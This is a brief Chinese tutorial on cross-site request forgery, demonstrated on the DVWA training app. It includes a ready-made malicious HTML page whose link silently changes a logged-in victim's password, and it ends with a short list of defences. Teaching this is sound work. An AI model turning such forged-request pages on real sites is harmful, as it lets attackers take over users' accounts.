简述CSRF请求跨站伪造

首先什么是CSRF:


简述CSRF请求跨站伪造


如图:

1,用户通过浏览器正常访问带有CSRF漏洞的网站。


如我去访问:8080/DVWA/login.php

简述CSRF请求跨站伪造


我们登录进去账号是:admin 密码是:password,找到一个修改密码的地方

简述CSRF请求跨站伪造

修改密码为123456,修改的url是:

:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#

简述CSRF请求跨站伪造


2,我们构造恶意网站B将代码保存为index.html

<html> <head> <title>这是恶意网页</title> </head> <body> <h2>这是恶意网页<h2> <a href=":8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a>  </body> </html>

我们访问网站B:点击***

简述CSRF请求跨站伪造

我们可以看到密码被改了(改成了password)

简述CSRF请求跨站伪造


防御:

1.尽量使用POST,限制GET

2.浏览器Cookie策略

3.Anti CSRF Token



微信公众号:

简述CSRF请求跨站伪造

郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。